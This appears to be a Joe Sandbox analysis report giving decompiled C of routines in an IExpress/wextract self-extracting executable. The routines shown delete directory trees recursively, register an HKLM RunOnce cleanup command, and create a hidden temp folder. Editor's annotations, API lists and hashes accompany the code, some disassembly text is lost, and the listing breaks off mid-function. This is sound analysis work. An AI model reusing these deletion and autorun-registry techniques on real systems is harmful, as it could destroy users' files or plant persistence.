				_t21 =  *0x178004; // 0x4ffa21aa (stack-cookie seed)
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00176CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66); // stack-cookie check and return
				} else {
					E00171680( &_v276, 0x104, __ecx);        // copy path into a MAX_PATH buffer
					_t58 = 0x104;
					E001716B3( &_v280, 0x104, "*");          // append "*" to build the search pattern
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00171680( &_v276, 0x104, _t65);      // rebuild "<dir>\" for each entry
						// Decompiler mislabels the field: this tests dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY (0x10).
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E001716B3( &_v276, 0x104,  &(_v596.dwReserved1)); // append cFileName
							SetFileAttributesA( &_v280, 0x80);  // FILE_ATTRIBUTE_NORMAL: strip read-only/hidden/system first
							DeleteFileA( &_v280);
						} else {
							// Skip "." and ".."; both compares read cFileName (dwReserved1 is a decompiler offset artefact).
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E001716B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0017658A( &_v280, 0x104, 0x171140);
								E00172390( &_v284);             // recurse into the subdirectory (most likely this routine's own entry point)
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}

APIs
• FindFirstFileA.KERNELBASE(?,00178A3A,001711F4,00178A3A,00000000,?,?), ref: 001723F6
• lstrcmpA.KERNEL32(?,001711F8), ref: 00172427
• lstrcmpA.KERNEL32(?,001711FC), ref: 0017243B
• SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00172495
• DeleteFileA.KERNEL32(?), ref: 001724A3
• FindNextFileA.KERNELBASE(00000000,00000010), ref: 001724AF
• FindClose.KERNELBASE(00000000), ref: 001724BE
• RemoveDirectoryA.KERNELBASE(00178A3A), ref: 001724C5
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
• String ID:
• API String ID: 836429354-0
• Opcode ID: 9ba5af2025df59830817542e761fc1b043135ce3ccb7dc1ee1ab90bc03e79392
• Instruction ID: d5eb65d10f165bf2ca1102c4ec133924405e323e2dec4a2fa7d2754ea8b185eb
• Opcode Fuzzy Hash: 9ba5af2025df59830817542e761fc1b043135ce3ccb7dc1ee1ab90bc03e79392
• Instruction Fuzzy Hash: D2318131604740ABD320EB68CC89AEF73FCAFD4315F44892DF59E86690EB749989C752
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 70%
			E00172BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				// Standard CRT start-up prologue: on Windows Vista (major version 6) or later, resolve
				// HeapSetInformation dynamically and enable heap termination on corruption.
				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) { // low byte of GetVersion() is the major version
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x17a288(0, 1, 0, 0); // HeapSetInformation(NULL, HeapEnableTerminationOnCorruption, NULL, 0)
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				 *0x179124 = 0;
                                                                                                                                                                                                    				if(E00172CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                    					_t9 = E00172F1D(_t18, _t20); // executed
                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                    					E001752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                    						_t32 =  *0x178a3a; // 0x0
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_t19 =  *0x179a2c; // 0x0
                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                    								E00171F90(_t19, _t21, _t22);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0x178588; // 0x0
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x179124; // 0x80070002
                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                    			}



















APIs
• GetVersion.KERNEL32(?,00000002,00000000,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C03
• GetModuleHandleW.KERNEL32(Kernel32.dll,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C18
• GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00172C28
• CloseHandle.KERNEL32(00000000,?,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C98
Memory Dump Source
• Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_170000_file.jbxd
Similarity
• API ID: Handle$AddressCloseModuleProcVersion
• String ID: HeapSetInformation$Kernel32.dll
• API String ID: 62482547-3460614246
• Opcode ID: 7d1a9b694665616e306991bd4160dfbe965fd1eee6d1e8d247f89292673f075c
• Instruction ID: 73e11b716938064739cad3a4caeef8fce4adc0c44f0abd03994e0e7f3991214a
• Opcode Fuzzy Hash: 7d1a9b694665616e306991bd4160dfbe965fd1eee6d1e8d247f89292673f075c
• Instruction Fuzzy Hash: 1111E5713403056BE7226BB5AC89A6F3779DFA43A0B648425F90CD3651EB74DCC38661
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00176F40() {

				SetUnhandledExceptionFilter(E00176EF0); // executed
				return 0;
			}


                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00176F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                    • Opcode ID: f98b349f671ee7a89706c1ca8fa604d827ee4608f599d91d0160f42e5408e47b
                                                                                                                                                                                                    • Instruction ID: c6d7328bdeb671c67b30a157d7ee5206ebc6a55fbf14434c31bf52769aa29ccd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f98b349f671ee7a89706c1ca8fa604d827ee4608f599d91d0160f42e5408e47b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D90026425150047E6505B709D1945979B15F8D612BC19460A019C4894DF6040C09522
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 93%
			// Annotations below were added by the editor; they are not part of the Joe Sandbox output.
			// What this listing shows: a wextract/IExpress-style stub registers a RunOnce value named
			// wextract_cleanup<N> (N = first unused index below 200) under HKLM so that the extraction
			// directory C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\ is deleted at the next logon, either via
			// rundll32 advpack.dll,DelNodeRunDLL32 (when advpack.dll exports it) or by re-running this
			// executable with /D:<dir>.
			E0017202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x178004; // 0x4ffa21aa  (stack security cookie; verified by E00176CE0 on return)
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;  // MAX_PATH
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;  // set to 1 below if advpack.dll exports DelNodeRunDLL32
				// HKEY_LOCAL_MACHINE (0x80000002); desired access 0x2001f = KEY_READ | KEY_WRITE
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00176CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				// Find the first free slot. E0017171E is a sprintf-style helper formatting "wextract_cleanup%d"
				// into the 0x50-byte buffer that the decompiler renders as the literal "wextract_cleanup0";
				// the loop stops at the first index whose value does not exist, or after 200 (0xc8) tries.
				while(1) {
					E0017171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					// Probe %SystemRoot%\System32\advpack.dll for the DelNodeRunDLL32 export.
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0017658A( &_v528, _t84, "advpack.dll");  // path-append helper
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						// Fallback: the cleanup command re-runs this executable with /D:<dir>.
						if(GetModuleFileNameA( *0x179a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						// Inline strlen(_v268) and strlen(string at 0x1791e4, most likely the temp-directory
						// literal pushed below); the command buffer is both lengths plus 0x50 bytes.
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x1791e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x1791e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1791e5);  // 0x40 = LPTR (fixed, zero-initialised)
						if(_t90 != 0) {
							 *0x178580 = _t66 ^ 0x00000001;  // global flag: 1 when the self-run /D: fallback is used
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";  // %s = system directory, %s = extraction dir
							if(_t66 == 0) {
								_t54 = "%s /D:%s";  // %s = this executable's path, %s = extraction dir
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");  // directory scheduled for deletion at next logon
							E0017171E(_t90, _t84, _t54,  &_v268);  // sprintf-style: command line into the LocalAlloc buffer
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {  // inline strlen of the formatted command
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2  (length including the terminating NUL)
							// Type 1 = REG_SZ; the value name is the formatted wextract_cleanup<N> buffer.
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E001744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);  // allocation failure path; 0x4b5 is a message id, 0x10 is probably MB_ICONERROR
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;  // 1 if the export exists
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					// Export present: _v268 = system directory plus the short string at 0x171140 (not shown in this listing).
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0017658A( &_v268, 0x104, 0x171140);
					}
					goto L11;
				}
				// All 200 slots are in use: give up, close the key and record the state in a global.
				_t36 = RegCloseKey(_v532);
				 *0x178530 = _t66;
				goto L23;
			}
Disassembly address column for E0017202A (instruction text was lost in extraction): addresses run from 0x0017202a through 0x0017210e for the body shown, with the function epilogue at 0x00172257 and 0x00172266.
                                                                                                                                                                                                    0x00172116
                                                                                                                                                                                                    0x00172122
                                                                                                                                                                                                    0x00172128
                                                                                                                                                                                                    0x0017212c
                                                                                                                                                                                                    0x00172179
                                                                                                                                                                                                    0x00172194
                                                                                                                                                                                                    0x001721de
                                                                                                                                                                                                    0x001721e4
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172256
                                                                                                                                                                                                    0x00172196
                                                                                                                                                                                                    0x00172196
                                                                                                                                                                                                    0x0017219c
                                                                                                                                                                                                    0x0017219f
                                                                                                                                                                                                    0x0017219f
                                                                                                                                                                                                    0x001721a1
                                                                                                                                                                                                    0x001721a2
                                                                                                                                                                                                    0x001721a6
                                                                                                                                                                                                    0x001721a8
                                                                                                                                                                                                    0x001721b0
                                                                                                                                                                                                    0x001721b0
                                                                                                                                                                                                    0x001721b2
                                                                                                                                                                                                    0x001721b3
                                                                                                                                                                                                    0x001721bc
                                                                                                                                                                                                    0x001721c7
                                                                                                                                                                                                    0x001721cb
                                                                                                                                                                                                    0x001721f1
                                                                                                                                                                                                    0x001721f6
                                                                                                                                                                                                    0x001721fd
                                                                                                                                                                                                    0x001721ff
                                                                                                                                                                                                    0x001721ff
                                                                                                                                                                                                    0x00172204
                                                                                                                                                                                                    0x00172213
                                                                                                                                                                                                    0x00172218
                                                                                                                                                                                                    0x0017221d
                                                                                                                                                                                                    0x0017221d
                                                                                                                                                                                                    0x00172220
                                                                                                                                                                                                    0x00172220
                                                                                                                                                                                                    0x00172222
                                                                                                                                                                                                    0x00172223
                                                                                                                                                                                                    0x00172229
                                                                                                                                                                                                    0x0017223d
                                                                                                                                                                                                    0x00172249
                                                                                                                                                                                                    0x00172250
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172250
                                                                                                                                                                                                    0x001721d2
                                                                                                                                                                                                    0x001721d9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001721d9
                                                                                                                                                                                                    0x0017213a
                                                                                                                                                                                                    0x00172141
                                                                                                                                                                                                    0x00172144
                                                                                                                                                                                                    0x0017214c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172163
                                                                                                                                                                                                    0x00172172
                                                                                                                                                                                                    0x00172172
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172163
                                                                                                                                                                                                    0x001720ea
                                                                                                                                                                                                    0x001720f0
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00172050
                                                                                                                                                                                                    • memset.MSVCRT ref: 0017205F
                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0017208C
                                                                                                                                                                                                      • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001720C9
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001720EA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172103
                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172122
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00172134
                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172144
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0017215B
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0017218C
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001721C1
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001721E4
                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0017223D
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172249
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00172250
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 178549006-3765599613
                                                                                                                                                                                                    • Opcode ID: 9c05a136b571819b1486d25573e4655dc331c7310f3117d12d38fab55d408efb
                                                                                                                                                                                                    • Instruction ID: fb8fa5e8662dbb2707525a74ff06320d7e1bd49af6ebd23b8aa98185c53427df
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c05a136b571819b1486d25573e4655dc331c7310f3117d12d38fab55d408efb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8551D371A40214ABDB209B64DC4DFEB7B7CEF94700F4081A8FA4DE6551DB719ECA8B60
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

control_flow_graph 232 1755a0-1755d9 call 17468f LocalAlloc 235 1755fd-17560c call 17468f 232->235 236 1755db-1755f1 call 1744b9 call 176285 232->236 241 175632-175643 lstrcmpA 235->241 242 17560e-175630 call 1744b9 LocalFree 235->242 248 1755f6-1755f8 236->248 246 175645 241->246 247 17564b-175659 LocalFree 241->247 242->248 246->247 250 175696-17569c 247->250 251 17565b-17565d 247->251 252 1758b7-1758c7 call 176ce0 248->252 253 1756a2-1756a8 250->253 254 17589f-1758b5 call 176517 250->254 255 17565f-175667 251->255 256 175669 251->256 253->254 259 1756ae-1756c1 GetTempPathA 253->259 254->252 255->256 260 17566b-17567a call 175467 255->260 256->260 263 1756f3-175711 call 171781 259->263 264 1756c3-1756c9 call 175467 259->264 269 175680-175691 call 1744b9 260->269 270 17589b-17589d 260->270 274 175717-175729 GetDriveTypeA 263->274 275 17586c-175890 GetWindowsDirectoryA call 17597d 263->275 272 1756ce-1756d0 264->272 269->248 270->252 272->270 276 1756d6-1756df call 172630 272->276 278 175730-175740 GetFileAttributesA 274->278 279 17572b-17572e 274->279 275->263 289 175896 275->289 276->263 290 1756e1-1756ed call 175467 276->290 282 175742-175745 278->282 283 17577e-17578f call 17597d 278->283 279->278 279->282 287 175747-17574f 282->287 288 17576b 282->288 295 1757b2-1757bf call 172630 283->295 296 175791-17579e call 172630 283->296 292 175771-175779 287->292 293 175751-175753 287->293 288->292 289->270 290->263 290->270 298 175864-175866 292->298 293->292 297 175755-175762 call 176952 293->297 307 1757d3-1757f8 call 17658a GetFileAttributesA 295->307 308 1757c1-1757cd GetWindowsDirectoryA 295->308 296->288 306 1757a0-1757b0 call 17597d 296->306 297->288 309 175764-175769 297->309 298->274 298->275 306->288 306->295 314 17580a 307->314 315 1757fa-175808 CreateDirectoryA 307->315 308->307 309->283 309->288 316 17580d-17580f 314->316 315->316 317 175827-17585c SetFileAttributesA call 171781 call 175467 316->317 318 175811-175825 316->318 317->270 323 17585e 317->323 318->298 323->298
                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                    			E001755A0(void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x178004; // 0x4ffa21aa
				_v8 = _t28 ^ _t110; // MSVC /GS stack-cookie prologue (cookie XOR frame pointer)
				_t2 = E0017468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2); // 0x40 = LPTR (LMEM_FIXED | LMEM_ZEROINIT)
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0017468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x179a30 = 1; // RUNPROGRAM value is "<None>": nothing to run after extraction
						}
						LocalFree(_t109);
						_t35 =  *0x178b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x178a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00176517(_t82, 0x7d2, 0, E00173210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x179a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x1791e4;
									_t40 = GetTempPathA(0x104, 0x1791e4); // 0x104 = MAX_PATH
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00171781( &_v268, 0x104, _t82, "A:\\"); // no temp path: scan drive roots starting at A:\
										__eflags = _v268 - 0x5a; // 0x5a = 'Z'
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) { // DRIVE_RAMDISK
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) { // INVALID_FILE_ATTRIBUTES
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) { // DRIVE_FIXED
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) { // DRIVE_REMOVABLE
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) { // 'A': skip removable A:
																L29:
																_t60 = _t66 + 1; // advance to the next drive letter
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) { // 'B': skip removable B:
																	goto L29;
																} else {
																	_t68 = E00176952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) { // removable drive accepted only above this threshold
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0017597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00172630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104); // fall back to the Windows directory
																				}
																				_t88 =  &_v268;
																				E0017658A(_t88, 0x104, "msdownld.tmp"); // build "<base>\msdownld.tmp" in the path buffer
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010; // FILE_ATTRIBUTE_DIRECTORY
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2); // FILE_ATTRIBUTE_HIDDEN
																					_push(_t88);
																					_t109 = 0x1791e4;
																					E00171781(0x1791e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00175467(0x1791e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0; // truncate the buffer back to "X:\" before trying the next letter
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00172630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0017597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                    																					}
                                                                                                                                                                                                    																				}
                                                                                                                                                                                                    																			}
                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                    																		}
                                                                                                                                                                                                    																	}
                                                                                                                                                                                                    																}
                                                                                                                                                                                                    															}
                                                                                                                                                                                                    														}
                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                    														goto L22;
